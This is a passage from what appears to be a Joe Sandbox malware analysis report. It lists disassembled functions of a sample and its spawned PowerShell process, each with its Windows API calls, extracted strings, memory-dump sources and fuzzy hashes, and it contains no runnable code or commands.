Opcode Fuzzy Hash: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
Instruction Fuzzy Hash: 6B017171200609BFDF315F11DD84AAB3A66FB84754F100037FA00B51E5C7BA8D52AE69

Function 00403B7E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,771B3420,00000000,C:\Users\user~1\AppData\Local\Temp\,00403B56,00403A6C,?,?,00000008,0000000A,0000000C), ref: 00403B98
GlobalFree.KERNEL32(00000000), ref: 00403B9F

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403B7E

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user~1\AppData\Local\Temp\
API String ID: 1100898210-2382934351
Opcode ID: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
Instruction ID: 6342289a3e1e3ca18c24491f6708bfd4349b13536718f8c5743bc800c8661b5d
Opcode Fuzzy Hash: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
Instruction Fuzzy Hash: FBE08C329015205BC6211F19ED04B1A77B86F45B27F06402AE8807B26287B82C838FD8

Function 00405E5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405E62
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405E72

Strings

C:\Users\user\Desktop, xrefs: 00405E5C

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3976562730
Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
Instruction ID: b9e9e75b8ba1df67f9f167ecd7c14c3df7ff164ad8267efb590a8552da577330
Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
Instruction Fuzzy Hash: 81D0A7B3400930DAC3127718EC04D9F77ACEF1634074A443AE580B7165D7785D8186EC

Function 00405F96 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA6
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBE
CharNextA.USER32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCF
lstrlenA.KERNEL32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD8

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
Instruction ID: c3aaa261a9e4bb9915bd58c77e7651ea6c0a11e303954dac61c17192ece284d7
Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
Instruction Fuzzy Hash: F7F06231105459EFDB029BA5DD00D9EBBA8EF15254B2540BAE840F7250D678DE019B69

Analysis Process: powershell.exePID: 4552, Parent PID: 3736COMMON

Executed Functions

Function 0062F538 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1530243227.000000000062D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0062D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_62d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdc711ff2450d505d32a85335fe16ba923d321e7897ca9fd6b6ce692f50602c2
Instruction ID: 77c88d2e1f031c5b31b680ec6d907640354e4d658789285f05be3707c5091108
Opcode Fuzzy Hash: cdc711ff2450d505d32a85335fe16ba923d321e7897ca9fd6b6ce692f50602c2
Instruction Fuzzy Hash: E721ED72604600EFDB05DF10E9C4B26BB76FBA8314F24C6B9E9094A356C736D856CF62

Function 06F761A0 Relevance: 13.1, Strings: 10, Instructions: 645COMMON

Download Yara Rule

Strings

4'q, xrefs: 06F76305
4'q, xrefs: 06F768C0
4'q, xrefs: 06F7684D
4'q, xrefs: 06F768CC
Pib, xrefs: 06F76571
4'q, xrefs: 06F762F9
tPq, xrefs: 06F76484
Pib, xrefs: 06F76567
tPq, xrefs: 06F76490
4'q, xrefs: 06F76841

Memory Dump Source

Source File: 00000007.00000002.1537957206.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$4'q$4'q$4'q$4'q$Pib$Pib$tPq$tPq
API String ID: 0-2441076465
Opcode ID: 3e64b87cc3f1ae57038b0a49aa067bec630935267381112dea8692c17a48a600
Instruction ID: 70d565ed456740f3e82e9264bc14a00f1a667ff9937f469b8a9dcf63420984db
Opcode Fuzzy Hash: 3e64b87cc3f1ae57038b0a49aa067bec630935267381112dea8692c17a48a600
Instruction Fuzzy Hash: 1532CF31F007148FEB54DF64D851BAABBA2AF89300F14C06AD905AF396DB31EC46CB91

Function 06F76538 Relevance: 4.0, Strings: 3, Instructions: 289COMMON

Download Yara Rule

Strings

4'q, xrefs: 06F768C0
Pib, xrefs: 06F76567
4'q, xrefs: 06F76841

Memory Dump Source

Source File: 00000007.00000002.1537957206.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$Pib
API String ID: 0-462079019
Opcode ID: 6c42a7e5344dc8e7cf2432f30b3b62fe8cc04e052a58c6422a1880b6869d419e
Instruction ID: 4f1cff2a1dde495f12fc0bdbb7f0c20dc493f0a607e0602d5f82e7bef7b47093
Opcode Fuzzy Hash: 6c42a7e5344dc8e7cf2432f30b3b62fe8cc04e052a58c6422a1880b6869d419e
Instruction Fuzzy Hash: 86B16874E006148FEB58CF54D550B9ABBB3AF88304F14C05AE909AF396DB76EC46CB91

Function 06F73E00 Relevance: 3.9, Strings: 3, Instructions: 124COMMON

Download Yara Rule

Strings

$q, xrefs: 06F73E5B
$q, xrefs: 06F73E67
$q, xrefs: 06F73E23

Memory Dump Source

Source File: 00000007.00000002.1537957206.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID: $q$$q$$q
API String ID: 0-3067366958
Opcode ID: ee762c2b97e7d131fa547695e01293218080baa65304725609a84f38bb7c8883
Instruction ID: 255b4b1b740a89f7fd577ad1d3e49a95f503a62319f9fd6d00db2bc46163178d
Opcode Fuzzy Hash: ee762c2b97e7d131fa547695e01293218080baa65304725609a84f38bb7c8883
Instruction Fuzzy Hash: 54413B33F00219AFDB649A69A8406AEF7B1AF84610B14843BDC15E7344DB31DD05C7E5

Function 06F74420 Relevance: 3.8, Strings: 3, Instructions: 94COMMON

Download Yara Rule

Strings

$q, xrefs: 06F74432
$q, xrefs: 06F7447C
$q, xrefs: 06F74488

Memory Dump Source

Source File: 00000007.00000002.1537957206.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID: $q$$q$$q
API String ID: 0-3067366958
Opcode ID: da862b91f6dd46b6c515b9a40aa0af6d94251c2bc3275eb7668a345b1f54b1fa
Instruction ID: 917e8d6fd654cd42f572f0e0f4482285b66524e9f0a082cd01ab5ecd19691001
Opcode Fuzzy Hash: da862b91f6dd46b6c515b9a40aa0af6d94251c2bc3275eb7668a345b1f54b1fa
Instruction Fuzzy Hash: F7213B32B003515BEB749D69A841B37B6D6BBC0215F24843BED19CB386DD31D841E3A1

Function 06F776C4 Relevance: 3.1, Strings: 2, Instructions: 591COMMON

Download Yara Rule

Strings

4'q, xrefs: 06F77C42
4'q, xrefs: 06F77C4E

Memory Dump Source

Source File: 00000007.00000002.1537957206.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q
API String ID: 0-1467158625
Opcode ID: 611e2c69b9eee5bd1420ab23ddc990ebe29199afe785fec7a30f6eda5e470b16
Instruction ID: a06d52032bdcc8c515fcbbdeab350c54166981b23ac0e34a5844042c3007dba0
Opcode Fuzzy Hash: 611e2c69b9eee5bd1420ab23ddc990ebe29199afe785fec7a30f6eda5e470b16
Instruction Fuzzy Hash: CF325D74B102149FE754DF54C850B9ABBA3BB88314F14C099DA09AF382DB72ED86CF91

Function 06F76B90 Relevance: 3.1, Strings: 2, Instructions: 591COMMON

Download Yara Rule

Strings

4'q, xrefs: 06F77042
4'q, xrefs: 06F7704E

Memory Dump Source

Source File: 00000007.00000002.1537957206.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q
API String ID: 0-1467158625
Opcode ID: 521786df028340b104ec104edfa0c150b7ca1f225566bffbfefdec811365bc6a
Instruction ID: ca4bbd6f83d09fff4e9ba382fa16c13ea65c7fafb52412b0fe51c6168fbdf476
Opcode Fuzzy Hash: 521786df028340b104ec104edfa0c150b7ca1f225566bffbfefdec811365bc6a
Instruction Fuzzy Hash: 7F325874B102049FE758DF58D850FAEBBB2AB89304F55C069E905AF391CB72EC46CB91

Function 06F7BFB0 Relevance: 3.0, Strings: 2, Instructions: 503COMMON

Download Yara Rule

Strings

4'q, xrefs: 06F7C4A9
4'q, xrefs: 06F7C49D

Memory Dump Source

Source File: 00000007.00000002.1537957206.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q
API String ID: 0-1467158625
Opcode ID: 8be95e9c6b4279be2b0ce2e48e10164098424ae7c6bb5414375217978ea29822
Instruction ID: 845f3c858ac39a687fcc2144a7423238242010dcde9923ceffe88c242ded8a90
Opcode Fuzzy Hash: 8be95e9c6b4279be2b0ce2e48e10164098424ae7c6bb5414375217978ea29822
Instruction Fuzzy Hash: AE224C70B503149FE754DF58C850B9ABBA2EB89304F14C099D909AF391DB72ED828F95

Function 06F74548 Relevance: 2.9, Strings: 2, Instructions: 434COMMON

Download Yara Rule

Strings

4'q, xrefs: 06F74943
4'q, xrefs: 06F7494F

Memory Dump Source

Source File: 00000007.00000002.1537957206.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q
API String ID: 0-1467158625
Opcode ID: 2173bd8f74fea7b60d35c39d7ffc4af571811bd00ac5c011c06d1c2bf75b2f99
Instruction ID: 9936366af94e5cf41c0cc81601aad430689561666dc0069594046fd7d84d1f9c
Opcode Fuzzy Hash: 2173bd8f74fea7b60d35c39d7ffc4af571811bd00ac5c011c06d1c2bf75b2f99
Instruction Fuzzy Hash: E2026D70F002449FEB54DF58D450BAABBF2AB89314F15C06AE905AF395DB72EC42CB91

Function 06F73F88 Relevance: 2.7, Strings: 2, Instructions: 173COMMON

Download Yara Rule

Strings

tPq, xrefs: 06F74038
tPq, xrefs: 06F7402C

Memory Dump Source

Source File: 00000007.00000002.1537957206.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID: tPq$tPq
API String ID: 0-4270251778
Opcode ID: 188c645b0f51fbfb29fdc4402e61b46ca4edd4526139eabf4ad9b22961db2480
Instruction ID: 478247fea24a40153095ced0c6ad6722a600e3383e3b25aa09f729338b699612
Opcode Fuzzy Hash: 188c645b0f51fbfb29fdc4402e61b46ca4edd4526139eabf4ad9b22961db2480
Instruction Fuzzy Hash: 9E518932F043449FD765976A9801BA6BBE6AFD5311F18C07BE945CB281DA71C801C3E1

Function 06F73DE1 Relevance: 2.6, Strings: 2, Instructions: 74COMMON

Download Yara Rule

Strings

$q, xrefs: 06F73E5B
$q, xrefs: 06F73E23

Memory Dump Source

Source File: 00000007.00000002.1537957206.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID: $q$$q
API String ID: 0-3126353813
Opcode ID: 3b8d119443cace1a5a90628236eaceaf95d0a73f595ef903e7f9f503d5428dec
Instruction ID: 9d73956cf25533dff0201c37be6ae419033b23bb1316f9d0123cf1faa1f37899
Opcode Fuzzy Hash: 3b8d119443cace1a5a90628236eaceaf95d0a73f595ef903e7f9f503d5428dec
Instruction Fuzzy Hash: D0213B73E00219BFCBA09F5998401EABBF4EF44620B19456BEC18E7241E731DD08D7E5

Function 06F7440D Relevance: 2.6, Strings: 2, Instructions: 70COMMON

Download Yara Rule

Strings

$q, xrefs: 06F74432
$q, xrefs: 06F7447C

Memory Dump Source

Source File: 00000007.00000002.1537957206.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID: $q$$q
API String ID: 0-3126353813
Opcode ID: aa29d7f4e6dfdf717750db29b21108ae7d7158ed49c16bcb70c691e6ef8f69e6
Instruction ID: 1b072b824831f9afa728ca67af45d7968c67bbcd1d20eab9a1000d03bd2362e4
Opcode Fuzzy Hash: aa29d7f4e6dfdf717750db29b21108ae7d7158ed49c16bcb70c691e6ef8f69e6
Instruction Fuzzy Hash: 5B113832F443416BEB745E69A841B327ED5AF80620F18842BEE648B2C3EA75C844E371

Function 06F77F88 Relevance: 1.9, Strings: 1, Instructions: 647COMMON

Download Yara Rule

Strings

4'q, xrefs: 06F77C42

Memory Dump Source

Source File: 00000007.00000002.1537957206.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: d233c88c4bd864ba3741f6bc27ac3456ce4a36435e5fa865a43417719691c73e
Instruction ID: 66d792a29578d6f9377a9f743e83d3d449ec009b7b8ac6dbb7ff143e6052899a
Opcode Fuzzy Hash: d233c88c4bd864ba3741f6bc27ac3456ce4a36435e5fa865a43417719691c73e
Instruction Fuzzy Hash: F3522B74A002149FE764DF14C850B9ABBB3BB84315F15C0A9DA09AF392DB72ED85CF91

Function 06F7C7A1 Relevance: 1.9, Strings: 1, Instructions: 620COMMON

Download Yara Rule

Strings

4'q, xrefs: 06F7C49D

Memory Dump Source

Source File: 00000007.00000002.1537957206.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: 3a51e3bbd8b7f94b430658a49838b8c1e54c75da92872f888f133da8bfcc381f
Instruction ID: 867a736ca6382dc61a1aef5ce75817bcfb88a6dc21acb066acc1ca737fc192fc
Opcode Fuzzy Hash: 3a51e3bbd8b7f94b430658a49838b8c1e54c75da92872f888f133da8bfcc381f
Instruction Fuzzy Hash: B8425E74B503149FE764DF58C850BAAB7B2EB89314F14C099D909AF391CB72ED828F91

Function 06F7809A Relevance: 1.8, Strings: 1, Instructions: 514COMMON

Download Yara Rule

Strings

4'q, xrefs: 06F77C42

Memory Dump Source

Source File: 00000007.00000002.1537957206.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: 94ab00acb51465f5236b3af9185faa8985a37be6a470dabd79367577755174f5
Instruction ID: c8029543b5f5bf3d3edd6ab877151d8b17d590720cf906e53cbe05df306c2e8e
Opcode Fuzzy Hash: 94ab00acb51465f5236b3af9185faa8985a37be6a470dabd79367577755174f5
Instruction Fuzzy Hash: FB223B74A102149FE764DF14C850B9ABBB3BB88315F14C099DA09AF392DB72ED85CF91

Function 06F76B6D Relevance: 1.7, Strings: 1, Instructions: 435COMMON

Download Yara Rule

Strings

4'q, xrefs: 06F77042

Memory Dump Source

Source File: 00000007.00000002.1537957206.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: 92ce73e132f7a2226af5a50aff0ec3522798cd64a93f74aab79fe498c844f24a
Instruction ID: 103230aa039ac6376c4bc00ac3305e571d3c7a9a1da689e0e1e1b1b7077062ab
Opcode Fuzzy Hash: 92ce73e132f7a2226af5a50aff0ec3522798cd64a93f74aab79fe498c844f24a
Instruction Fuzzy Hash: 9D025A74A102049FE758DF58D850F9ABBB2BF85304F55C069E905AF392C7B2EC46CB91

Function 06F7452D Relevance: 1.6, Strings: 1, Instructions: 385COMMON

Download Yara Rule

Strings

4'q, xrefs: 06F74943

Memory Dump Source

Source File: 00000007.00000002.1537957206.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: 7f77856367ced6126cbfa2c56cdbcd186e4699c65fd973ded623c9afef4adad8
Instruction ID: a6c729e86d6d8e5aaa9fb6ca3b76c989b0dc8e0c905bdbad0a39e089c7e22c11
Opcode Fuzzy Hash: 7f77856367ced6126cbfa2c56cdbcd186e4699c65fd973ded623c9afef4adad8
Instruction Fuzzy Hash: 43F12774F002449FEB94CF58D450AAABBF2BB84314F15C06AE915AF395CB72EC42CB91

Function 0070FF20 Relevance: 1.3, Strings: 1, Instructions: 53COMMON

Download Yara Rule

Strings

RFk, xrefs: 0070FF3F

Memory Dump Source

Source File: 00000007.00000002.1530662117.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_700000_powershell.jbxd

Similarity

API ID:
String ID: RFk
API String ID: 0-3206758255
Opcode ID: 4589c2b43c1fd7c4a35708b7fd6d12c8a8e280d0ba0b45b525a0f9216ce1a40f
Instruction ID: 67f9b1633745a7e94d9748a26dad0faf53fd266943ecb92734f95467a5eb676c
Opcode Fuzzy Hash: 4589c2b43c1fd7c4a35708b7fd6d12c8a8e280d0ba0b45b525a0f9216ce1a40f
Instruction Fuzzy Hash: 54115BB1C003098FDB20DFAAC8457DEFBF5EB48320F148429D559A7240CB799945CF91

Function 0070F4A6 Relevance: 1.3, Strings: 1, Instructions: 52COMMON

Download Yara Rule

Strings

(q, xrefs: 0070F4B9

Memory Dump Source

Source File: 00000007.00000002.1530662117.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_700000_powershell.jbxd

Similarity

API ID:
String ID: (q
API String ID: 0-2414175341
Opcode ID: 8cc1acabe2edc2ab7fc620708c870469b21d7498dcf0e91fc2ad0159758102ec
Instruction ID: 638722c7fdff7974ef3c38a8eb084a56027a28a7fb11e9931b136a4d7eeb3f62
Opcode Fuzzy Hash: 8cc1acabe2edc2ab7fc620708c870469b21d7498dcf0e91fc2ad0159758102ec
Instruction Fuzzy Hash: B001F7B97042408FC35AAB78E41455C7BE2EFC622172449BBE146CF7A2CA399C06C762

Function 0070FF28 Relevance: 1.3, Strings: 1, Instructions: 50COMMON

Download Yara Rule

Strings

RFk, xrefs: 0070FF3F

Memory Dump Source

Source File: 00000007.00000002.1530662117.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_700000_powershell.jbxd

Similarity

API ID:
String ID: RFk
API String ID: 0-3206758255
Opcode ID: 46f14022d010e5d38c8e1e7e3f8c0058ec72dd9a3f05e8281ad95f2e029ed846
Instruction ID: bce41e203ec8505ef74eb465af00c47ee930075ba58bbe9a5cf3cab6eff54ec6
Opcode Fuzzy Hash: 46f14022d010e5d38c8e1e7e3f8c0058ec72dd9a3f05e8281ad95f2e029ed846
Instruction Fuzzy Hash: 2F115871C003098FDB20DFAAC445BDEFBF5EB48320F148429D519A7240CB79A941CFA4

Function 08CD1E68 Relevance: .4, Instructions: 426COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1541449003.0000000008CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8cd0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1693f0ba41135a776df9f0c48d0e9b35bf59678ea16b7a720147ec2ac0b707a8
Instruction ID: c2593ee057fe8a3f43388c5ccac7173198d7f13e7c01063a585da1253fe62f7f
Opcode Fuzzy Hash: 1693f0ba41135a776df9f0c48d0e9b35bf59678ea16b7a720147ec2ac0b707a8
Instruction Fuzzy Hash: 24022A75A00219DFDB15DF98D884AAEFBB2FF88310F248159E915AB365C731ED42CB90

Function 08CD2428 Relevance: .4, Instructions: 420COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1541449003.0000000008CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8cd0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea1b44b2dcc1bbfc4285aeaf55d474b9a685253095ab15c0d551e5b7bc1ae367
Instruction ID: 8544e125a99574fc6f19ce7a0f7abb6ab36280f0418166720b3d8d5a6a760c90
Opcode Fuzzy Hash: ea1b44b2dcc1bbfc4285aeaf55d474b9a685253095ab15c0d551e5b7bc1ae367
Instruction Fuzzy Hash: F3026B34A00219DFDB15DF98D884AAEBBB2FF88311F248159E915AB355D731ED82CB90

Function 08CD14A0 Relevance: .4, Instructions: 394COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1541449003.0000000008CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8cd0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4724c249bbb901311e40986f8c75f3465fe9db1f5799f651f44f67b09e464c74
Instruction ID: 74ee5bd1732d5ac5cbfb07e7bd8ec9bcd24b273749acf654f7d81dbb5cf5e41e
Opcode Fuzzy Hash: 4724c249bbb901311e40986f8c75f3465fe9db1f5799f651f44f67b09e464c74
Instruction Fuzzy Hash: 56F12834A00219DFDB15DF98D884AADFBB2FF48310F288159E915AB365C735ED82CB90

Function 06F7CCDA Relevance: .3, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1537957206.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 565d2f2e8603f9da3412d05a5730c292f23bed6d9ef20392d922d62163826a80
Instruction ID: 3c4a21089a7c9602a9334357bb53baee35ae0c58501c8888d8f3dd589a5ba9e3
Opcode Fuzzy Hash: 565d2f2e8603f9da3412d05a5730c292f23bed6d9ef20392d922d62163826a80
Instruction Fuzzy Hash: 13E14C74E00228CFEB64DB64C851B9ABBB2BF85304F54C199D9096B385DB72ED81CF91

Function 08CD1078 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1541449003.0000000008CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8cd0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65d4c95850b4e78214361e3fc957b74a87b36d7608187981f6bdf8f3ad3b6cec
Instruction ID: 8c1998eba9a266b4a6afdd332d369457186327e231383ef1191aa6ee0c75b88d
Opcode Fuzzy Hash: 65d4c95850b4e78214361e3fc957b74a87b36d7608187981f6bdf8f3ad3b6cec
Instruction Fuzzy Hash: 84C11835A01218DFDB15DFA8D484A9DFBB2FF88311F28815AE904AB355D771ED82CB90

Function 00707322 Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1530662117.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_700000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d64d8d953bed8256dc856eae5285f0a31c710c0d5b0d7080e34b53a87028837c
Instruction ID: f41523d95f9158ca0b93aaba643e434c4d22cf6c6ad24aa9cb24ff314a37314f
Opcode Fuzzy Hash: d64d8d953bed8256dc856eae5285f0a31c710c0d5b0d7080e34b53a87028837c
